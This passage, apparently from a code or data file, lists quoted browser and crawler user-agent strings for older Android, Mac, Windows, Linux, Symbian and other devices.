"Mozilla/5.0 (Linux; U; Android 1.5; en-us; T-Mobile G1 Build/CRB43) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari 525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; fr-fr; GT-I5700 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 2.0.1; de-de; Milestone Build/SHOLS_U2_01.14.0) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.0; en-us; Milestone Build/ SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1; en-us; HTC Legend Build/cupcake) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1-update1; de-de; HTC Desire 1.19.161.5 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Camino/2.2.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Camino/2.2a1pre",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941",
"Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 ",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3",
"Mozilla/5.0 (Maemo; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13",
"Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13",
"Mozilla/5.0 (PLAYSTATION 3; 1.10)",
"Mozilla/5.0 (PLAYSTATION 3; 2.00)",
"Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC6-01/011.010; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.2 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC7-00/012.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE6-00/021.002; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.16 Mobile Safari/533.4 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE7-00/010.016; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba",
"Mozilla/5.0 (SymbianOS/9.1; U; de) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es50",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es70",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia5700/3.27; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.70; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0",
"Mozilla/5.0 (SymbianOS 9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344",
"Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344",
"Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525",
"Mozilla/5.0 (Unknown; U; UNIX BSD/SYSV system; C -) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.2",
"Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
"Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)",
"Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5",
"Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20",
"Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a",
"Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ",
"Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0",
"Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1",
"Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15",
"Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko",
"Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025",
"Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1",
"Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1",
"Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)",
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330",
"Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8",
"Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0",
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9",
"Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0",
"Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15",
"Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3",
"Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6",
"MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23",
"msnbot/0.11 ( http://search.msn.com/msnbot.htm)",
"msnbot/1.0 ( http://search.msn.com/msnbot.htm)",
"msnbot/1.1 ( http://search.msn.com/msnbot.htm)",
"msnbot-media/1.1 ( http://search.msn.com/msnbot.htm)",
"NetSurf/1.2 (NetBSD; amd64)",
"Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0",
"Nokia6100/1.0 (04.01) Profile/MIDP-1.0 Configuration/CLDC-1.0",
"Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1",
